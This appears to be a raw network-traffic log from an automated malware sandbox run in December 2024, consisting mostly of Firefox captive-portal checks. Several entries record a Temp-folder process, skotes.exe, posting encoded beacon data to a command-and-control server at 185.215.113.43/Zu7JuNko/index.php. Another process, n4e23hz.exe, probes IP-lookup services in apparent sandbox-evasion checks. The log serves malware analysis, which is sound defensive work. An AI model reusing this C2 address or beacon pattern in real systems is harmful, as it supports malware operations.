Dec 10, 2024 00:44:40.288290977 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41177 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:48.243393898 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:48.559997082 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41185 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:58.606638908 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:44:59.610560894 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:59.926990032 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41196 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:45:05.636399031 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:45:05.956587076 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41202 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:45:07.099351883 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:45:07.413733959 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41204 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:45:17.509484053 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:45:20.874949932 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:45:21.190037012 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41218 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:45:31.212078094 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:45:34.264242887 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:45:34.579102993 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41231 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:45:35.986387014 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:45:36.303174019 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41233 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:45:46.305941105 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:45:56.507906914 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:02.588371038 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:46:02.904800892 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41259 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:46:12.922224998 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:23.123246908 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:33.323240995 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:43.523030996 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:53.717720985 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:47:24.399317980 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:47:24.716197014 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41341 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:47:37.681682110 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:47:37.998280048 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41354 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50105	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:36.152369976 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:44:37.536801100 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	50116	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:37.099342108 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	50119	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:37.561885118 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	50124	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:37.926014900 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50126	104.16.185.241	80	5724	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:38.311278105 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 10, 2024 00:44:39.501409054 CET	535	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:39 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=SuiZ4PLb0XNTx5GxkpLmaIeKidBtCZbq6X0PinWutKc-1733787879-1.0.1.1-XQ5SwusuUQer_SBpiFoG21ABVtvIY4OFXpPQb2kihIoxv5la9OMX9F0dGIKhZQujy.WFxz4p69257q2Noqzs7A; path=/; expires=Tue, 10-Dec-24 00:14:39 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ef8dd45c9637d14-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	50128	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:38.408759117 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	50133	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:39.006166935 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50134	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:39.287259102 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:40.624263048 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	50135	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:39.736221075 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50137	208.95.112.1	80	5724	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:40.112972975 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 10, 2024 00:44:41.360373020 CET	175	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:40 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	50138	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:40.416752100 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:44:41.502851009 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76720 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:44:48.562563896 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:44:48.883220911 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76727 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:44:58.989088058 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:44:59.931830883 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:45:00.249888897 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76739 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:45:05.960943937 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:45:06.347712040 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76745 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:45:07.416712046 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:45:07.734355927 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76746 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:45:17.821422100 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:45:21.204041004 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:45:21.518194914 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76760 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:45:31.574311972 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:45:34.582361937 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:45:34.899357080 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76773 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:45:36.306041002 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:45:36.620220900 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76775 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:45:46.688853979 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:45:56.890270948 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:02.908807039 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:46:03.225913048 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76802 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:46:13.284051895 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:23.485411882 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:33.684967995 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:43.882699966 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:46:54.082933903 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 10, 2024 00:47:24.720900059 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 10, 2024 00:47:25.039144993 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Mon, 09 Dec 2024 02:26:01 GMT Age: 76883 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 10, 2024 00:47:38.001413107 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
